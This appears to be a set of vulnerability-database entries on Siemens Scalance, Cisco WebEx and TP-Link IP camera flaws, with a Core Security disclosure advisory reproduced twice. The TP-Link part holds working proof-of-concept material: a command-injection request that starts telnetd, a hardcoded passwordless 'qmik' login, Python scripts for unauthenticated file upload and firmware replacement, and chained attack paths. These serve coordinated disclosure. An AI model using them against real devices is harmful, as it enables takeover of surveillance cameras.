Unspecified vulnerability in the command-line management interface on Siemens Scalance W7xx devices with firmware before 4.5.4 allows remote attackers to bypass authentication and execute arbitrary code via a (1) SSH or (2) TELNET connection. The Siemens Scalance W-700 Series is an industrial wireless switch device developed by Siemens. Devices supporting IEEE 802.11a/b/g with firmware version < v4.5.4 below are affected by this vulnerability: SCALANCE W744-1, W746-1, W747-1 SCALANCE W744-1PRO, W746-1PRO, W747-1RR SCALANCE W784- 1, W784-1RR SCALANCE W786-1PRO, W786-2PRO, W786-3PRO, W786-2RR SCALANCE W788-1PRO, W788-2PRO, W788-1RR, W788-2RR. Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and completely compromise an affected system. Siemens Scalance W-700 Series running firmware versions prior to 4.5.4 are vulnerable

The Meeting Center component in Cisco WebEx 11 generates different error messages for invalid file-access attempts depending on whether a file exists, which allows remote authenticated users to enumerate files via a series of SPI calls, aka Bug ID CSCuc35965. WebEx is prone to a remote security vulnerability. Cisco WebEx is a set of Web conferencing tools developed by American Cisco (Cisco), which can assist office workers in different places to coordinate and cooperate. WebEx services include Web conferencing, telepresence video conferencing and enterprise instant messaging (IM). There is a security vulnerability in the Meeting Center component of Cisco WebEx version 11.0. Attackers can use these error messages through a series of SPI Call enumeration file

Siemens Scalance W7xx devices with firmware before 4.5.4 use the same hardcoded X.509 certificate across different customers' installations, which makes it easier for remote attackers to conduct man-in-the-middle attacks against SSL sessions by leveraging the certificate's trust relationship. The Siemens Scalance W-700 Series is an industrial wireless switch device developed by Siemens. Devices supporting IEEE 802.11a/b/g with firmware version < v4.5.4 below are affected by this vulnerability: SCALANCE W744-1, W746-1, W747-1 SCALANCE W744-1PRO, W746-1PRO, W747-1RR SCALANCE W784- 1, W784-1RR SCALANCE W786-1PRO, W786-2PRO, W786-3PRO, W786-2RR SCALANCE W788-1PRO, W788-2PRO, W788-1RR, W788-2RR. Attackers can exploit this issue to spoof a valid server and conduct man-in-the-middle attacks. Successful exploits will cause victims to accept the certificates assuming they are from a legitimate site. Siemens Scalance W-700 series running firmware versions prior to 4.5.4 are vulnerable

cgi-bin/admin/servetest in TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6 allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the ServerName parameter and (2) other unspecified parameters. The TP-Link TL-SC3171 IP camera is a webcam device. TP-Link TL-SC3171 IP Cameras are prone to multiple remote command-injection vulnerabilities. Attackers may exploit these issues to execute arbitrary commands with root privileges in the context of the affected device. TP-Link TL-SC3171 running firmware version LM.1.6.18P12_sign5 is vulnerable; other versions may also be affected. There is a command injection vulnerability in the cgi-bin/admin/servetest file in versions earlier than LM.1.6.18P12_sign6 of TP-LINK IP Cameras. The following models are affected: TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G. *Advisory Information* Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras Advisory ID: CORE-2013-0618 Advisory URL: http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras Date published: 2013-07-30 Date of last update: 2013-07-30 Vendors contacted: TP-Link Release mode: Coordinated release 2. *Vulnerability Information* Class: OS command injection [CWE-78], Use of hard-coded credentials [CWE-798], Authentication Bypass Issues [CWE-592], Missing Authentication for Critical Function [CWE-306] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2578, CVE-2013-2579, CVE-2013-2580, CVE-2013-2581 3. [CVE-2013-2578] to execute arbitrary commands through the file '/cgi-bin/admin/servetest'. 2. [CVE-2013-2579] to execute arbitrary commands in a shell using hard-coded credentials. 3. [CVE-2013-2580] to perform unauthenticated remote file uploads. 5. [CVE-2013-2581] to perform unauthenticated remote firmware upgrades. 3.1. *Attack Paths* There are several attack paths that can be exploited by combining these vulnerabilities with other ones discovered by Eliezer Varade Lopez, Javier Repiso Sanchez and Jonas Ropero Castillo [2]. Additional attack paths are available, but the ones listed here allow understanding how an attacker could compromise the affected device. 3.1.1. *Attack Path I* (Authentication: none) 1. Upload a rooted firmware exploiting [CVE-2013-2581]. 2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2]. 3.1.2. *Attack Path II* (Authentication: bypassed) 1. Reset the device to its factory defaults exploiting 'http://<ip-cam>/cgi-bin/hardfactorydefault'[2]. After this step, the authentication can by bypassed by using 'admin:admin' as a valid 'username:password'. 2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2]. 3. Start the Telnet service exploiting [CVE-2013-2578]. 4. Login to the Telnet service using user 'qmik' (no password) [CVE-2013-2579], and use the device as a pivoting point. 4. *Vulnerable Packages* Tests and PoC were run on: . 5. *Vendor Information, Solutions and Workarounds* Vendor provides the links to (pre-release) patched firmware versions [3]. The final official versions will be released in the next few days. Please, contact TP-Link for further information. 6. *Credits* These vulnerabilities were discovered by Flavio de Cristofaro and researched with the help of Andres Blanco from Core Security Technologies. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *OS Command Injection in servetest* [CVE-2013-2578] The file '/cgi-bin/admin/servetest' has an OS command injection in several of its parameters that can be exploited by an authenticated user to execute arbitrary commands. The following proof of concept starts the telnetd service: /----- GET /cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://192.168.1.100/progress.htm If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 192.168.1.100 Proxy-Connection: Keep-Alive Cookie: VideoFmt=1 Authorization: Basic YWRtaW46YWRtaW4= Content-Length: 2 -----/ 7.2. *Hard-coded credentials in telnet service* [CVE-2013-2579] The affected system includes a hard-coded login with no password which could be used by a remote attacker to access the OS of the affected device using the built-in telnet service: /----- username: qmik password: (none) -----/ The 'qmik' user is allowed to execute the command 'su', allowing the user to execute arbitrary commands with root level privileges. The telnet service can be enabled through [CVE-2013-2578]. 7.3. *Unauthenticated remote file uploads* [CVE-2013-2580] The file '/cgi-bin/uploadfile' allows an unauthenticated user to perform remote file uploads as shown in the following Python PoC: /----- import requests fileName = "lala.tmp" f = open(fileName, "w") f.write("lala") f.close() requests.post("http://192.168.1.100/cgi-bin/uploadfile", files={fileName: open(fileName, "rb")}) -----/ The uploaded file (in this example lala.tmp) will be hosted in the '/mnt/mtd' directory. 7.4. *Unauthenticated remote firmware upgrades* [CVE-2013-2581] The file '/cgi-bin/firmwareupgrade' allows an unauthenticated user to perform remote firmware upgrades as shown in the following Python POC: /----- import requests requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset") fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin" cookies={"VideoFmt":"1"} requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset", files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies) -----/ 8. *Report Timeline* . 2013-06-12: Core Security Technologies notifies the TP-Link team of the vulnerability. 2013-06-18: Core Security Technologies notifies the TP-Link team of the vulnerability and set the estimated publication date of the advisory for July 10, 2013. 2013-06-19: TP-Link answers saying that these vulnerabilities are the same as the ones published on May 28, 2013. 2013-06-26: Core Security Technologies notifies the TP-Link team that these are new, different, vulnerabilities and sends a draft report with technical information. 2013-06-26: Vendor acknowledges the receipt of the technical report. 2013-07-01: Vendor requests additional technical information. 2013-07-04: Core re-sends an improved technical report with additional information regarding possible attack paths [Sec. 3.1]. 2013-07-10: First release date missed. 2013-07-15: Core asks for a status update. 2013-07-22: Vendor notifies that a patched firmware version will be released on July 29th. 2013-07-22: Core re-schedules the advisory publication for July 29th. 2013-07-26: Vendor notifies that a (pre-release) patched firmware version is available [3] and being tested. 2013-07-30: Advisory CORE-2013-0618 is published. 9. *References* [1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171. [3] See the online version, http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

TP-Link IP Cameras TL-SC3130, TL-SC3130G, TL-SC3171, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6 have an empty password for the hardcoded "qmik" account, which allows remote attackers to obtain administrative access via a TELNET session. The TP-Link TL-SC3171 IP camera is a webcam device. TP-Link TL-SC3171 running firmware version LM.1.6.18P12_sign5 is vulnerable; other versions may also be affected. The vulnerability comes from the fact that the program sets the hard-coded 'qmik' account with an empty password. A remote attacker can exploit this vulnerability through a TELNET session to gain administrator privileges. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras 1. *Advisory Information* Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras Advisory ID: CORE-2013-0618 Advisory URL: http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras Date published: 2013-07-30 Date of last update: 2013-07-30 Vendors contacted: TP-Link Release mode: Coordinated release 2. *Vulnerability Information* Class: OS command injection [CWE-78], Use of hard-coded credentials [CWE-798], Authentication Bypass Issues [CWE-592], Missing Authentication for Critical Function [CWE-306] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2578, CVE-2013-2579, CVE-2013-2580, CVE-2013-2581 3. *Vulnerability Description* Multiple vulnerabilities have been found in TP-Link TL-SC3171 [1] IP camera running firmware version LM.1.6.18P12_sign5 that could allow an attacker: 1. [CVE-2013-2578] to execute arbitrary commands through the file '/cgi-bin/admin/servetest'. 2. [CVE-2013-2579] to execute arbitrary commands in a shell using hard-coded credentials. 3. [CVE-2013-2580] to perform unauthenticated remote file uploads. 5. [CVE-2013-2581] to perform unauthenticated remote firmware upgrades. 3.1. *Attack Paths* There are several attack paths that can be exploited by combining these vulnerabilities with other ones discovered by Eliezer Varade Lopez, Javier Repiso Sanchez and Jonas Ropero Castillo [2]. Additional attack paths are available, but the ones listed here allow understanding how an attacker could compromise the affected device. 3.1.1. *Attack Path I* (Authentication: none) 1. Upload a rooted firmware exploiting [CVE-2013-2581]. 2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2]. 3.1.2. *Attack Path II* (Authentication: bypassed) 1. Reset the device to its factory defaults exploiting 'http://<ip-cam>/cgi-bin/hardfactorydefault'[2]. After this step, the authentication can by bypassed by using 'admin:admin' as a valid 'username:password'. 2. Reboot the device by exploiting 'http://<ip-cam>/cgi-bin/reboot'[2]. 3. Start the Telnet service exploiting [CVE-2013-2578]. 4. Login to the Telnet service using user 'qmik' (no password) [CVE-2013-2579], and use the device as a pivoting point. 4. *Vulnerable Packages* Tests and PoC were run on: . 5. *Vendor Information, Solutions and Workarounds* Vendor provides the links to (pre-release) patched firmware versions [3]. The final official versions will be released in the next few days. Please, contact TP-Link for further information. 6. *Credits* These vulnerabilities were discovered by Flavio de Cristofaro and researched with the help of Andres Blanco from Core Security Technologies. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *OS Command Injection in servetest* [CVE-2013-2578] The file '/cgi-bin/admin/servetest' has an OS command injection in several of its parameters that can be exploited by an authenticated user to execute arbitrary commands. The following proof of concept starts the telnetd service: /----- GET /cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://192.168.1.100/progress.htm If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 192.168.1.100 Proxy-Connection: Keep-Alive Cookie: VideoFmt=1 Authorization: Basic YWRtaW46YWRtaW4= Content-Length: 2 -----/ 7.2. The telnet service can be enabled through [CVE-2013-2578]. 7.3. *Unauthenticated remote file uploads* [CVE-2013-2580] The file '/cgi-bin/uploadfile' allows an unauthenticated user to perform remote file uploads as shown in the following Python PoC: /----- import requests fileName = "lala.tmp" f = open(fileName, "w") f.write("lala") f.close() requests.post("http://192.168.1.100/cgi-bin/uploadfile", files={fileName: open(fileName, "rb")}) -----/ The uploaded file (in this example lala.tmp) will be hosted in the '/mnt/mtd' directory. 7.4. *Unauthenticated remote firmware upgrades* [CVE-2013-2581] The file '/cgi-bin/firmwareupgrade' allows an unauthenticated user to perform remote firmware upgrades as shown in the following Python POC: /----- import requests requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset") fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin" cookies={"VideoFmt":"1"} requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset", files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies) -----/ 8. *Report Timeline* . 2013-06-12: Core Security Technologies notifies the TP-Link team of the vulnerability. 2013-06-18: Core Security Technologies notifies the TP-Link team of the vulnerability and set the estimated publication date of the advisory for July 10, 2013. 2013-06-19: TP-Link answers saying that these vulnerabilities are the same as the ones published on May 28, 2013. 2013-06-26: Core Security Technologies notifies the TP-Link team that these are new, different, vulnerabilities and sends a draft report with technical information. 2013-06-26: Vendor acknowledges the receipt of the technical report. 2013-07-01: Vendor requests additional technical information. 2013-07-04: Core re-sends an improved technical report with additional information regarding possible attack paths [Sec. 3.1]. 2013-07-10: First release date missed. 2013-07-15: Core asks for a status update. 2013-07-22: Vendor notifies that a patched firmware version will be released on July 29th. 2013-07-22: Core re-schedules the advisory publication for July 29th. 2013-07-26: Vendor notifies that a (pre-release) patched firmware version is available [3] and being tested. 2013-07-30: Advisory CORE-2013-0618 is published. 9. *References* [1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171. [2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84. [3] See the online version, http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc